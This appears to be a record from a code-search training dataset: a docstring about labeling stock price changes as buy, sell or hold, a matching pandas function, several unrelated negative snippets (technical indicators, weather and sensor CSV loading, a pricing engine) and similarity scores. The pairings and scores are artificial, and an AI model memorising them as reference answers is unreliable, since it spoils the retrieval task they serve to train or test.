fillna=True)\n df1['rsi20' ] = rsi (df1[\"Close\"], n=20, fillna=True)\n df1['rsi50' ] = rsi (df1[\"Close\"], n=50, fillna=True)\n\n\n df1['stoc10' ] = stoch (df1[\"High\"],df1[\"Low\"],df1[\"Close\"], n=10 , fillna=True)\n df1['stoc20' ] = stoch (df1[\"High\"],df1[\"Low\"],df1[\"Close\"], n=20 , fillna=True)\n df1['stoc50' ] = stoch (df1[\"High\"],df1[\"Low\"],df1[\"Close\"], n=50 , fillna=True)\n df1['stoc200'] = stoch (df1[\"High\"],df1[\"Low\"],df1[\"Close\"], n=200, fillna=True)\n\n df1['mom5' ] = wr (df1[\"High\"],df1[\"Low\"],df1[\"Close\"], lbp=5 , fillna=True)\n df1['mom10' ] = wr (df1[\"High\"],df1[\"Low\"],df1[\"Close\"], lbp=10 , fillna=True)\n df1['mom20' ] = wr (df1[\"High\"],df1[\"Low\"],df1[\"Close\"], lbp=20 , fillna=True)\n df1['mom50' ] = wr (df1[\"High\"],df1[\"Low\"],df1[\"Close\"], lbp=50 , fillna=True)\n\n df1['sma10' ] = df1['Close'].rolling(window=10 ).mean()\n df1['sma20' ] = df1['Close'].rolling(window=20 ).mean()\n df1['sma50' ] = df1['Close'].rolling(window=50 ).mean()\n df1['sma200'] = df1['Close'].rolling(window=200).mean()\n df1['sma400'] = df1['Close'].rolling(window=400).mean()\n #df1['mom']=pandas.stats.\n df1 = df1[-(df1.shape[0]-skipFirstLines):] # skip 1st x rows, x years due to NAN in sma, range\n\n df1['nvo' ] = df1['Volume'] / df1['sma10'] / 100 # normalized volume\n\n\n df1['range'] = df1['Close'] - df1['Open']\n df1['percentage'] = df1['range'] / df1['Open'] * 100\n\n #df/df.iloc[0,:]\n df1['range_sma'] = (df1 ['Close'] - df1 ['sma10']) / df1['Close']\n df1['range_sma1'] = (df1 ['sma10'] - df1 ['sma20']) / df1['sma10']#small sma above big sma indicates that price is going up\n df1['range_sma2'] = (df1 ['sma20'] - df1 ['sma50']) / df1['sma20']#small sma above big sma indicates that price is going up\n df1['range_sma3'] = (df1 ['sma50'] - df1['sma200']) / df1['sma50']#small sma above big sma indicates that price is going up\n df1['range_sma4'] = (df1['sma200'] - df1['sma400']) / df1['sma200']#small sma above big sma indicates that price is going up\n\n df1['rel_bol_hi10'] = (df1 ['High'] - df1 ['bb_hi10']) / df1['High']\n df1['rel_bol_lo10'] = (df1 ['Low'] - df1 ['bb_lo10']) / df1['Low']\n df1['rel_bol_hi20'] = (df1 ['High'] - df1 ['bb_hi20']) / df1['High']\n df1['rel_bol_lo20'] = (df1 ['Low'] - df1 ['bb_lo20']) / df1['Low']\n df1['rel_bol_hi50'] = (df1 ['High'] - df1 ['bb_hi50']) / df1['High']\n df1['rel_bol_lo50'] = (df1 ['Low'] - df1 ['bb_lo50']) / df1['Low']\n df1['rel_bol_hi200'] = (df1 ['High'] - df1 ['bb_hi200']) / df1['High']\n df1['rel_bol_lo200'] = (df1 ['Low'] - df1 ['bb_lo200']) / df1['Low']\n\n #df1['isUp'] = 0\n print(df1)\n # print ('\\ndf1=\\n',df1.tail())\n # print ('\\nsma_10=\\n',df1['sma10'] )\n # print ('\\nsma_200=\\n',df1['sma200'] )\n # print ('\\nrsi10=\\n',df1['rsi10'] )\n # print ('\\nrsi5=\\n',df1['rsi5'] )\n # print ('\\nstoc10=\\n',df1['stoc10'] )\n # print ('\\nstoc200=\\n',df1['stoc200'] )\n # print ('\\nrangesma=\\n',df1['rangesma'])\n # print ('\\nrangesma4=\\n',df1['rangesma4'])\n # print ('\\nrel_bol_hi10=\\n',df1['rel_bol_hi10'])\n # print ('\\nrel_bol_hi200=\\n',df1['rel_bol_hi200'])\n\n # df1['sma4002' ] = sma\n # df1['ema' ] = ema\n # df1['macd' ] = macd\n # df1['stoc' ] = stoc\n # df1['rsi' ] = rsi\n#tech_ind = pd.concat([sma, ema, macd, stoc, rsi, adx, cci, aroon, bands, ad, obv, wma, mom, willr], axis=1)\n\n ## labeling\n ## smart labeling\n if size_output == 2:\n df1.loc[df1.range > 0.0, 'isUp'] = 1\n df1.loc[df1.range <= 0.0, 'isUp'] = 0\n if size_output == 3:\n df1['isUp'] = 0\n df1.loc[ df1.percentage >= +0.1 , 'isUp'] = 1\n df1.loc[ df1.percentage <= -0.1 , 'isUp'] = -1\n # df1.loc[(-0.1 < df1.percentage < +0.1), 'isUp'] = 0\n #df1['isUp'] = np.random.randint(2, size=df1.shape[0])# if u the model accuracy with random labaling expect to get 0.5\n\n\n #direction = (close > close.shift()).astype(int)\n #target = direction.shift(-1).fillna(0).astype(int)\n #target.name = 'target'\n #sma10 = sma10.rename(columns={symbol: symbol+'sma10'})\n #sma20 = sma20.rename(columns={symbol: symbol+'sma20'})\n #df1 = df1.rename(columns={'Close': symbol+'Close'})\n '''\n# loss: 0.1222 - acc: 0.9000 - val_loss: 0.1211 - val_acc: 0.9364 epoch50 sma+range+close+open (range tell model the answer)\n# loss: 0.6932 - acc: 0.4860 - val_loss: 0.6932 - val_acc: 0.4969 random data >>> random results\n# loss: 0.6922 - acc: 0.5205 - val_loss: 0.6911 - val_acc: 0.5364 epoch50 sma\n# loss: 0.6923 - acc: 0.5198 - val_loss: 0.6914 - val_acc: 0.5360\n# loss: 0.6922 - acc: 0.5217 - val_loss: 0.6911 - val_acc: 0.5353\n# loss: 0.6431 - acc: 0.5846 - val_loss: 0.7373 - val_acc: 0.5364\n# loss: 0.5373 - acc: 0.7114 - val_loss: 0.6112 - val_acc: 0.6773 epoch50\n# loss: 0.5198 - acc: 0.7225 - val_loss: 0.5632 - val_acc: 0.6797 epoch100 sma+stoc+rsi\n# loss: 0.5487 - acc: 0.7079 - val_loss: 0.6115 - val_acc: 0.6740 SPY 1970 epoch100 sma+stoc+rsi+bol 1970\n# loss: 0.4112 - acc: 0.8140 - val_loss: 0.5576 - val_acc: 0.7324 SPY 1970 epoch500 nvo+mom+sma+stoc+rsi+bol 1970\n\n# loss: 0.6047 - acc: 0.6574 - val_loss: 0.6257 - val_acc: 0.6580 SPY 2000\n# loss: nan - acc: 0.4711 - val_loss: nan - val_acc: 0.4563 DJI 2000\n# loss: nan - acc: 0.4906 - val_loss: nan - val_acc: 0.4626 QQQ 2000\n\n nvo Open High Low Close range_sma isUp\nDate \n1964-05-01 748.525452 79.459999 80.470001 79.459999 80.169998 0.001821 1.0\n1964-05-04 669.824179 80.169998 81.010002 79.870003 80.470001 0.005580 1.0\n2019-07-11 10607.754714 2999.620117 3002.330078 2988.800049 2999.909912 0.008677 1.0\n2019-07-12 9973.829690 3003.360107 3013.919922 3001.870117 3013.770020 0.010287 1.0\n'''\n pd.set_option('display.max_columns', 500)\n pd.set_option('display.width' , 1000)\n print('columns=', df1.columns)\n print ('\\ndf1=\\n',df1.loc[:, ['nvo', 'Open' ,'High' , 'Low' , 'Close', 'range_sma', 'isUp']])\n print ('\\ndf1=\\n',df1.loc[:, ['sma10','sma20','sma50','sma200', 'range_sma1']])\n print ('\\ndf1=\\n',df1.loc[:, ['rsi10','rsi20','rsi50','rsi5']])\n print ('\\ndf1=\\n',df1.loc[:, ['stoc10','stoc20','stoc50','stoc200']])\n print ('\\ndf1=\\n',df1.loc[:, ['bb_hi10','bb_hi20','bb_hi50','bb_hi200']])#, 'sma4002']])\n print ('\\ndf1=\\n',df1.loc[:, ['bb_lo10','bb_lo20','bb_lo50','bb_lo200']])#, 'sma4002']])\n print ('\\ndf1=\\n',df1.loc[:, ['rel_bol_hi10','rel_bol_hi20','rel_bol_hi50','rel_bol_hi200']])#, 'sma4002']])\n print ('\\ndf1[ 0]=\\n',df1.iloc[0])#, 'sma4002']])\n print ('\\ndf1[ 1]=\\n',df1.iloc[1])#, 'sma4002']])\n print ('\\ndf1[9308]=\\n',df1.iloc[9308])#, 'sma4002']])\n print ('\\ndf1[-2]=\\n',df1.iloc[-2])#, 'sma4002']])\n print ('\\ndf1[-1]=\\n',df1.iloc[-1])#, 'sma4002']])\n #df = pd.DataFrame(record, columns = ['Name', 'Age', 'Stream', 'Percentage'])\n # rslt_df = df[df1['isUp'] == 1]\n # print ('\\ndf1 describe direction = +1\\n',rslt_df.describe())\n # rslt_df = df[df1['isUp'] == -1]\n # print ('\\ndf1 describe direction = -1\\n',rslt_df.describe())\n # rslt_df = df[df1['isUp'] == 0]\n # print ('\\ndf1 describe direction = 0\\n',rslt_df.describe())\n # # print ('\\ndf1=\\n',df1.loc[:, ['ema','macd','stoc', 'rsi']])\n print('\\ndf11 describe=\\n',df1.loc[:, ['percentage', 'nvo', 'range', 'mom5', 'mom10', 'mom20', 'mom50', 'rsi5', 'rsi10', 'rsi20', 'rsi50', 'stoc10', 'stoc20', 'stoc50', 'stoc200']].describe())\n return df1", "def compute_aggregate_weather_data():\n\n # get a list of all the csv files names in the 'weather_data' directory\n files = get_all_csv_files_in_directory('weather_data')\n\n # Todo: if the number of csv files doesn't match the expected value, unzip remaining using the 'os' module\n\n if len(files) == 0:\n\n # Unzip all files in current directory and subdirectories\n print \"unzipping weather files...\"\n os.system(\"unzip 'weather_data/*.zip' -d weather_data\")\n\n\n # Try again to get files\n files = get_all_csv_files_in_directory('weather_data')\n\n # Throw exception if still missing csv files\n if len(files) == 0:\n raise ValueError(\"Missing weather data in csv format in the 'weather_data' directory\")\n\n # convert the list of csv file names to a list of corresponding DataFrames\n dallas_files = filter(lambda file_name : \"KDAL\" in file_name, files)\n houston_files = filter(lambda file_name : \"KHOU\" in file_name, files)\n san_antonio_files = filter(lambda file_name : \"KSAT\" in file_name, files)\n\n print \"Retrieved weather data files...\"\n print \"\\t# of Dallas weather files found: \", len(dallas_files)\n print \"\\t# of Houston weather files found: \", len(houston_files)\n print \"\\t# of San Antonio weather files found: \", len(san_antonio_files)\n\n dallas_dfs = map(lambda file_name: read_weather_data_from_csv(\"./weather_data/\" + file_name), dallas_files)\n houston_dfs = map(lambda file_name: read_weather_data_from_csv(\"./weather_data/\" + file_name), houston_files)\n san_antonio_dfs = map(lambda file_name: read_weather_data_from_csv(\"./weather_data/\" + file_name), san_antonio_files)\n\n dallas_df = pd.concat(dallas_dfs)\n houston_df = pd.concat(houston_dfs)\n san_antonio_df = pd.concat(san_antonio_dfs)\n\n print \"Aggregating all of the weather data...\"\n # fold the list of data frames into a single data frame\n aggregate_df = reduce(lambda df1, df2: pd.merge(df1, df2, on=\"Date\", how=\"outer\"), [dallas_df, houston_df, san_antonio_df]).sort_values(\"Date\")\n\n return aggregate_df", "def _read_source_data(self) -> pd.DataFrame:\n df = None\n try:\n logger.info(\"reading csv base file under simulation folder\", class_name=self.__class__.__name__)\n df = pd.read_csv(\n f\"{Path(__file__).parents[1]}/data/simulation/{self.base_data_filename}\"\n )\n except FileNotFoundError:\n logger.warning(\"base file not processed, trying under unprocessed folder\",\n class_name=self.__class__.__name__)\n try:\n df = pd.read_csv(\n f\"{Path(__file__).parents[1]}/data/unprocessed/{self.base_data_filename}\"\n )\n except FileNotFoundError:\n logger.error(\"base file not found... exiting\", class_name=self.__class__.__name__)\n exit(1)\n return df", "def new_csv_imp(infile):\r\n with open(infile, \"r\") as fd:\r\n txt = fd.readlines()\r\n if len(txt) > 1:\r\n if 'Serial' in txt[0]:\r\n print('{:} is Solinst'.format(infile))\r\n if 'UNIT: ' in txt[7]:\r\n level_units = str(txt[7])[5:].strip().lower()\r\n if 'UNIT: ' in txt[12]:\r\n temp_units = str(txt[12])[5:].strip().lower()\r\n f = pd.read_csv(infile, skiprows=13, parse_dates=[[0, 1]], usecols=[0, 1, 3, 4])\r\n print(f.columns)\r\n f['DateTime'] = pd.to_datetime(f['Date_Time'], errors='coerce')\r\n f.set_index('DateTime', inplace=True)\r\n f.drop('Date_Time', axis=1, inplace=True)\r\n f.rename(columns={'LEVEL': 'Level', 'TEMP': 'Temp'}, inplace=True)\r\n level = 'Level'\r\n temp = 'Temp'\r\n\r\n if level_units == \"feet\" or level_units == \"ft\":\r\n f[level] = pd.to_numeric(f[level])\r\n elif level_units == \"kpa\":\r\n f[level] = pd.to_numeric(f[level]) * 0.33456\r\n printmes(\"Units in kpa, converting {:} to ft...\".format(os.path.basename(infile)))\r\n elif level_units == \"mbar\":\r\n f[level] = pd.to_numeric(f[level]) * 0.0334552565551\r\n elif level_units == \"psi\":\r\n f[level] = pd.to_numeric(f[level]) * 2.306726\r\n printmes(\"Units in psi, converting {:} to ft...\".format(os.path.basename(infile)))\r\n elif level_units == \"m\" or level_units == \"meters\":\r\n f[level] = pd.to_numeric(f[level]) * 3.28084\r\n printmes(\"Units in psi, converting {:} to ft...\".format(os.path.basename(infile)))\r\n else:\r\n f[level] = pd.to_numeric(f[level])\r\n printmes(\"Unknown units, no conversion\")\r\n\r\n if temp_units == 'Deg C' or temp_units == u'\\N{DEGREE SIGN}' + u'C':\r\n f[temp] = f[temp]\r\n elif temp_units == 'Deg F' or temp_units == u'\\N{DEGREE SIGN}' + u'F':\r\n printmes('Temp in F, converting {:} to C...'.format(os.path.basename(infile)))\r\n f[temp] = (f[temp] - 32.0) * 5.0 / 9.0\r\n return f\r\n\r\n elif 'Date' in txt[1]:\r\n print('{:} is Global'.format(infile))\r\n f = pd.read_csv(infile, skiprows=1, parse_dates=[[0, 1]])\r\n # f = f.reset_index()\r\n f['DateTime'] = pd.to_datetime(f['Date_ Time'], errors='coerce')\r\n f = f[f.DateTime.notnull()]\r\n if ' Feet' in list(f.columns.values):\r\n f['Level'] = f[' Feet']\r\n f.drop([' Feet'], inplace=True, axis=1)\r\n elif 'Feet' in list(f.columns.values):\r\n f['Level'] = f['Feet']\r\n f.drop(['Feet'], inplace=True, axis=1)\r\n else:\r\n f['Level'] = f.iloc[:, 1]\r\n # Remove first and/or last measurements if the transducer was out of the water\r\n # f = dataendclean(f, 'Level')\r\n flist = f.columns.tolist()\r\n if ' Temp C' in flist:\r\n f['Temperature'] = f[' Temp C']\r\n f['Temp'] = f['Temperature']\r\n f.drop([' Temp C', 'Temperature'], inplace=True, axis=1)\r\n elif ' Temp F' in flist:\r\n f['Temperature'] = (f[' Temp F'] - 32) * 5 / 9\r\n f['Temp'] = f['Temperature']\r\n f.drop([' Temp F', 'Temperature'], inplace=True, axis=1)\r\n else:\r\n f['Temp'] = np.nan\r\n f.set_index(['DateTime'], inplace=True)\r\n f['date'] = f.index.to_julian_date().values\r\n f['datediff'] = f['date'].diff()\r\n f = f[f['datediff'] > 0]\r\n f = f[f['datediff'] < 1]\r\n # bse = int(pd.to_datetime(f.index).minute[0])\r\n # f = hourly_resample(f, bse)\r\n f.rename(columns={' Volts': 'Volts'}, inplace=True)\r\n f.drop([u'date', u'datediff', u'Date_ Time'], inplace=True, axis=1)\r\n return f\r\n else:\r\n print('{:} is unrecognized'.format(infile))", "def get_data(fpath):\n\n visits = ['SC', 'BL', 'V01', 'V02', 'V03', 'V04', 'V05', 'V06', 'V07',\n 'V08', 'V09', 'V10', 'V11', 'V12', 'V13', 'V14', 'V15']\n dtype = dict(PATNO=str,\n EVENT_ID=cdtype(visits, ordered=True))\n\n fname = op.join(fpath, 'DATScan_Analysis.csv')\n data = pd.read_csv(fname, dtype=dtype)\n\n # melt into tidy DataFrame\n data = pd.melt(data.rename(columns=RENAME_COLS),\n id_vars=RENAME_COLS.values(),\n var_name='TEST', value_name='SCORE')\n data = data.dropna(axis=0, subset=['SCORE'])\n data = data.assign(**ASSIGN_COLS)[RETAIN_COLS]\n\n return data" ]
[ "0.65828145", "0.62339157", "0.6199246", "0.6138019", "0.61140287", "0.6102608", "0.6034207", "0.6006899", "0.59451014", "0.5918473", "0.5865274", "0.5854998", "0.58193326", "0.58130115", "0.57813156", "0.5780981", "0.57623285", "0.5745247", "0.5731047", "0.57274765", "0.5706876", "0.5698789", "0.56957924", "0.56748563", "0.5631103", "0.5626811", "0.5622767", "0.5615026", "0.5595093", "0.55946773", "0.5589522", "0.5574688", "0.5569084", "0.55661976", "0.55647665", "0.55607957", "0.5558461", "0.5557236", "0.55450046", "0.554175", "0.5537679", "0.5526941", "0.55256677", "0.55143833", "0.55143833", "0.55143833", "0.55022895", "0.5496899", "0.549485", "0.5478223", "0.547385", "0.54620546", "0.5450399", "0.5447803", "0.5439068", "0.5418925", "0.54170525", "0.5412913", "0.5412124", "0.5411632", "0.5410055", "0.54042965", "0.539676", "0.539395", "0.5390772", "0.53903574", "0.5389095", "0.5377868", "0.536887", "0.536797", "0.5364796", "0.5361779", "0.53595006", "0.535744", "0.53557533", "0.5351422", "0.5349176", "0.53428614", "0.5342824", "0.5341278", "0.5331534", "0.53290695", "0.5324123", "0.5323884", "0.53225565", "0.53223485", "0.532109", "0.531664", "0.53124595", "0.53113633", "0.53054374", "0.53035873", "0.53011316", "0.52929366", "0.52899265", "0.52883846", "0.52850413", "0.5280353", "0.5278469", "0.5273854" ]
0.5412425
58
pricing data converted into percentage change to normalize data percentage change will be considered as features labels will be either buy, sell or hold. if each week, the company's increasing by 2% = buy if decreasing by 2% = sell, if neither, hold. Each model is made on a percompany basis, but each company is going take into account all the other prices in the index
def process_data_for_labels(df, ticker, time_period): data_ = df.fillna(0) # ensuring NaN values are replaced by 0 incase data doesn't exist. # Avoiding inplace as it does not convert NaNs as expected, and will return None tickers = df.columns.values.tolist() # grab all adj close values of security for i in range(1,time_period+1): # loop through 7 days of adj close values data_['{}_{}d'.format(ticker, i)] = (data_[ticker].shift(-i)-data_[ticker])/data_[ticker] # create each column with percentage change in adj close values with increasing time. The shift # function allows us to grab the previous adjusted close entry. data_.fillna(0) # To ensure there are no NaN values in dataset return tickers, data_ # returns list of tickers and dataframe
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def percent_changes(self):\n\n # close_t = float(val[\"klines\"][\"1m\"].get(self.mw.cfg_manager.pair, {})[-5][4])\n klines_data = self.mw.klines.get(\"1m\")\n coin_data = klines_data.get(self.mw.cfg_manager.pair)\n\n if isinstance(coin_data, list):\n close_5m = float(self.mw.klines[\"1m\"][self.mw.cfg_manager.pair][-5][4])\n close_15m = float(self.mw.klines[\"1m\"][self.mw.cfg_manager.pair][-15][4])\n # close_30m = float(self.mw.klines[\"1m\"][self.mw.cfg_manager.pair][-30][4])\n close_1h = float(self.mw.klines[\"1m\"][self.mw.cfg_manager.pair][-60][4])\n close_4h = float(self.mw.klines[\"1m\"][self.mw.cfg_manager.pair][-240][4])\n\n change_5m_value = ((float(val[\"tickers\"][self.mw.cfg_manager.pair][\"lastPrice\"]) / float(close_5m)) - 1) * 100\n change_15m_value = ((float(val[\"tickers\"][self.mw.cfg_manager.pair][\"lastPrice\"]) / float(close_15m)) - 1) * 100\n # change_30m_value = ((float(val[\"tickers\"][self.mw.cfg_manager.pair][\"lastPrice\"]) / float(close_30m)) - 1) * 100\n change_1h_value = ((float(val[\"tickers\"][self.mw.cfg_manager.pair][\"lastPrice\"]) / float(close_1h)) - 1) * 100\n change_4h_value = ((float(val[\"tickers\"][self.mw.cfg_manager.pair][\"lastPrice\"]) / float(close_4h)) - 1) * 100\n\n change_1d_value = float(val[\"tickers\"][self.mw.cfg_manager.pair][\"priceChangePercent\"])\n\n\n changes = [self.mw.change_5m, self.mw.change_15m, self.mw.change_1h, self.mw.change_4h, self.mw.change_1d]\n change_values = [change_5m_value, change_15m_value, change_1h_value, change_4h_value, change_1d_value]\n\n for i, change in enumerate(changes):\n if change_values[i] > 0:\n operator = \"+\"\n color = Colors.color_green\n elif change_values[i] < 0:\n operator = \"\"\n color = Colors.color_pink\n else:\n operator = \"\"\n color = Colors.color_grey\n\n # print(str(change))\n change.setText(\"<span style='color: \" + color + \"'>\" + operator + \"{0:.2f}\".format(change_values[i]) + \"%</span\")", "def calculate_profit(self):", "def trend_price_up(self):\n raise NotImplementedError()", "def stock_price_summary(price_changes):\n\n gains = 0.0\n losses = 0.0\n\n for change in price_changes:\n if change > 0:\n gains += change\n elif change < 0:\n losses += change\n\n return (math.floor(gains*100)/100, math.ceil(losses*100)/100)", "def get_data_from_individual_company_pages(soup):\n individual_company_data = []\n usd_roe = get_usd_roe()\n company_code = (\n soup.find(\"meta\", {\"name\": \"description\"}).get(\"content\").split(\":\")[0]\n )\n current_price_usd = float(\n soup.find(\"span\", {\"class\": \"price-section__current-value\"}).text.replace(\n \",\", \"\"\n )\n )\n current_price = round(current_price_usd * usd_roe)\n try:\n p_e_ratio = float(\n soup.find(\n \"div\", {\"class\": \"snapshot__header\"}, string=\"P/E Ratio\"\n ).previous_sibling.replace(\",\", \"\")\n )\n except AttributeError:\n p_e_ratio = 0\n\n try:\n week_52_low = float(\n soup.find(\"div\", {\"class\": \"snapshot__header\"}, string=\"52 Week Low\")\n .previous_sibling.strip()\n .replace(\",\", \"\")\n )\n except AttributeError:\n week_52_low = 1\n\n try:\n week_52_high = float(\n soup.find(\"div\", {\"class\": \"snapshot__header\"}, string=\"52 Week High\")\n .previous_sibling.strip()\n .replace(\",\", \"\")\n )\n except AttributeError:\n week_52_high = 0\n\n unreal_profit_per_year_percent = round((week_52_high / week_52_low - 1) * 100, 2)\n\n individual_company_data.append(\n [company_code, current_price, p_e_ratio, unreal_profit_per_year_percent]\n )\n\n company_df = pd.DataFrame(\n columns=[\"company_code\", \"current_price\", \"P_E\", \"potential_profit_percent\"]\n )\n company_df = company_df.append(\n {\n \"company_code\": company_code,\n \"current_price\": current_price,\n \"P_E\": p_e_ratio,\n \"potential_profit_percent\": unreal_profit_per_year_percent,\n },\n ignore_index=True,\n )\n\n return company_df", "def train_predictors(market_data, functions_for_typical_price_data, functions_for_hlc_price_data, labels_for_typical_price_data, labels_for_hlc_price_data):\r\n standard = {}\r\n # high = market_data.loc[:, 'high'].values.tolist()\r\n # low = market_data.loc[:, 'low'].values.tolist()\r\n # close = market_data.loc[:, 'close'].values.tolist()\r\n volume = market_data.loc[:, 'volume'].values\r\n # typical_prices = typical_price(high, low, close)\r\n typical_prices = market_data.loc[:, 'weightedAverage'].values\r\n standard['volume'] = (np.nanmean(volume), np.nanstd(volume))\r\n standard['typical_price'] = (np.nanmean(typical_prices), np.nanstd(typical_prices))\r\n x = ((volume - standard['volume'][0])/standard['volume'][1])\r\n x = np.c_[(typical_prices - standard['typical_price'][0])/standard['typical_price'][1], x]\r\n typical_prices = typical_prices.tolist()\r\n for f, label in zip(functions_for_typical_price_data, labels_for_typical_price_data):\r\n values = np.array(f(typical_prices))\r\n standard[label] = (np.nanmean(values), np.nanstd(values))\r\n x = np.c_[x, (values - standard[label][0])/standard[label][1]]\r\n # for f, label in zip(functions_for_hlc_price_data, labels_for_hlc_price_data):\r\n # values = np.array(f(high, low, close))\r\n # if 'typical_price' in label and label != 'typical_price':\r\n # standard[label] = standard['typical_price']\r\n # else:\r\n # standard[label] = (np.nanmean(values), np.nanstd(values))\r\n # x = np.c_[x, (values - standard[label][0])/standard[label][1]]\r\n return pd.DataFrame(data=x, columns=['typical_price', 'volume']+labels_for_typical_price_data, index=market_data.index), standard", "def test_predictors(market_data, functions_for_typical_price_data, functions_for_hlc_price_data, labels_for_typical_price_data, labels_for_hlc_price_data, scaling_dict):\r\n x = []\r\n # high = market_data.loc[:, 'high'].values.tolist()\r\n # low = market_data.loc[:, 'low'].values.tolist()\r\n # close = market_data.loc[:, 'close'].values.tolist()\r\n volume = market_data.loc[:, 'volume'].values\r\n # typical_prices = typical_price(high, low, close)\r\n typical_prices = market_data.loc[:, 'weightedAverage'].values\r\n x.append(((typical_prices - scaling_dict['typical_price'][0])/scaling_dict['typical_price'][1]).tolist())\r\n typical_prices = typical_prices.tolist()\r\n x.append(((volume - scaling_dict['volume'][0])/scaling_dict['volume'][1]).tolist())\r\n for f, label in zip(functions_for_typical_price_data, labels_for_typical_price_data):\r\n values = np.array(f(typical_prices))\r\n x.append(((values - scaling_dict[label][0])/scaling_dict[label][1]).tolist())\r\n # for f, label in zip(functions_for_hlc_price_data, labels_for_hlc_price_data):\r\n # values = np.array(f(high, low, close))\r\n # x.append(((values - scaling_dict[label][0])/scaling_dict[label][1]).tolist())\r\n return pd.DataFrame(data=np.array(x).T, columns=['typical_price', 'volume']+labels_for_typical_price_data, index=market_data.index)", "def percentageChange(self):\n try:\n curPrice = self.dailyData[-1].currentPrice\n closePrice = self.historicData[-1].closePrice\n except IndexError: # Just return zero when no historic or dailyData is available yet\n return 0.0\n return (curPrice - closePrice)/closePrice * 100", "def compute_market_prices(prices):\n denom = prices.bid_volume + prices.ask_volume\n numer = (prices.bid_price * prices.ask_volume +\n prices.ask_price * prices.bid_volume)\n mask = denom == 0\n denom[mask] = 2\n numer[mask] = prices.bid_price[mask] + prices.ask_price[mask]\n prices = prices.copy()\n prices['market_price'] = numer / denom\n return prices", "def optimal_pricing_engine(model_ID, quote_df, COP_l=0, COP_m=0, COP_h=0):\r\n '''\r\n The purpose of this function is to process a quote using the optimal\r\n pricing model (as stored in the segmentation tree) to determine the \r\n optimal price and win probability data.\r\n \r\n Created: 05 May 2016 by Glenn Melzer\r\n Updated: 01 Aug 2016 by Glenn Melzer\r\n \r\n INPUTS:\r\n model_ID = the name of the model to be used for creating the optimal price \r\n quote_df = the dataframe of quote components (with the same column \r\n format as the historical data input dataframe).\r\n COP_l = Low bottom line customized optimal price\r\n COP_m = Median bottom line customized optimal price\r\n COP_h = High bottom line customized optimal price\r\n \r\n KEY INTERNAL OBJECTS NEEDED FOR THE ENGINE: \r\n seg_df = the quote segmentation tree built previously.\r\n ref_prc_col = the column that contains the reference price (typically list price)\r\n first = the name of the first column in quote_df that contains a segment \r\n classification identifier to be used.\r\n last = the name of the last column in quote_df that contains a classification \r\n identifier to be used. All columns from the first through the last\r\n will be used.\r\n prc_col = the column index name in quote_df that contains the historical\r\n quote price (as a % of reference price) as modified by the segmentation\r\n process.\r\n x_col = the name of the independant variable that affects pricing used in\r\n the regression to calculate the m and b parameters of the linear models. \r\n quote_attribute_cols = the list of column index names of quote_df that \r\n contain the historical data quote attributes.\r\n y_intercept = True or False. Indicate if the regression should have a\r\n y intercept. The default is False.\r\n \r\n OUTPUTS:\r\n quote_df = the original quote_df updated with columns for optimal price,\r\n win probability, etc.\r\n total_deal_stats = the statistics of the total deal\r\n \r\n ACCEPTANCE CRITERIA:\r\n The quote_df contains the required output column populated with data.\r\n '''\r\n start_time = time.time() #start a timer\r\n \r\n #this loads the correct model into seg_df based on the model_ID\r\n etext = 'seg_df = ' + rules_df.loc[model_ID,'seg_model_file_name'] + '_df.copy()'\r\n exec(etext)\r\n #this looks up the needed variables given the model_ID\r\n quote_id_col = rules_df.loc[model_ID,'quote_id_col']\r\n ref_prc_col = rules_df.loc[model_ID,'ref_prc_col']\r\n cost_col = rules_df.loc[model_ID,'cost_col']\r\n quote_prc_col = rules_df.loc[model_ID,'quote_prc_col']\r\n prc_col = rules_df.loc[model_ID,'prc_col']\r\n x_col = rules_df.loc[model_ID,'x_col']\r\n first = rules_df.loc[model_ID,'first']\r\n last = rules_df.loc[model_ID,'last']\r\n psych_factor = rules_df.loc[model_ID,'psych_factor']\r\n quote_attribute_cols = eval(rules_df.loc[model_ID,'quote_attribute_cols'])\r\n y_intercept = rules_df.loc[model_ID,'y_intercept']\r\n \r\n #The following defines objects needed to manage the segmentation tree building process\r\n cols = quote_df.columns\r\n for i in np.arange(len(cols)): #this for loop assigns column names to a list (cols)\r\n if (cols[i] == first):\r\n first_coln = i\r\n if (cols[i] == last):\r\n last_coln = i\r\n if (cols[i] == prc_col):\r\n prc_coln = i \r\n print ' Segmentation starts with Column (first_coln)(first): % r' % first_coln, first\r\n print ' Segmentation ends with Column (last_coln)(last): % r' % last_coln, last\r\n column_nums = range(first_coln, last_coln + 1) #this creates a list of the numbers of the columns used for component segmentation\r\n column_names = list(quote_df.columns[column_nums])\r\n print ' Column numbers of the index columns (column_nums): ',column_nums\r\n print ' Column names of the index column (column_names): ',column_names\r\n print ' Price Column (prc_coln)(prc_col): % r' % prc_coln, prc_col\r\n print ' quote_attribute_cols: % r' % quote_attribute_cols\r\n \r\n \r\n #this section ensures that needed columns are added to quote_df to match format of input_dataframe_expanded_05.csv\r\n quote_df.loc[:,'ComLowPofL'] = ''\r\n quote_df.loc[:,'ComMedPofL'] = ''\r\n quote_df.loc[:,'ComHighPofL'] = ''\r\n quote_df.loc[:,'ComMedPrice'] = ''\r\n quote_df.loc[:,'DealSize'] = ''\r\n quote_df.loc[:,'LogDealSize'] = ''\r\n quote_df.loc[:,'ComPctContrib'] = ''\r\n quote_df.loc[:,'TreeNode'] = ''\r\n #this section adds more columns to support optimal price calculations\r\n quote_df.loc[:,'ComTMCPofL'] = ''\r\n quote_df.loc[:,'AdjComLowPofL'] = ''\r\n quote_df.loc[:,'AdjComMedPofL'] = ''\r\n quote_df.loc[:,'AdjComHighPofL'] = ''\r\n quote_df.loc[:,'AdjComLowPrice'] = ''\r\n quote_df.loc[:,'AdjComMedPrice'] = ''\r\n quote_df.loc[:,'AdjComHighPrice'] = ''\r\n #this section creates columns for the optimal price data\r\n quote_df.loc[:,'OptimalPricePofL'] = ''\r\n quote_df.loc[:,'OptimalPrice'] = ''\r\n quote_df.loc[:,'OptimalPriceWinProb'] = ''\r\n quote_df.loc[:,'OptimalPriceGP'] = ''\r\n quote_df.loc[:,'OptimalPriceExpectedGP'] = ''\r\n quote_df.loc[:,'OptimalPriceIntervalLow'] = ''\r\n quote_df.loc[:,'OptimalPriceIntervalHigh'] = ''\r\n #this section creates columns for the quoted price data\r\n quote_df.loc[:,'QuotePricePofL'] = ''\r\n quote_df.loc[:,'QuotePrice'] = ''\r\n quote_df.loc[:,'QuotePriceWinProb'] = ''\r\n quote_df.loc[:,'QuotePriceGP'] = ''\r\n quote_df.loc[:,'QuotePriceExpectedGP'] = ''\r\n #this 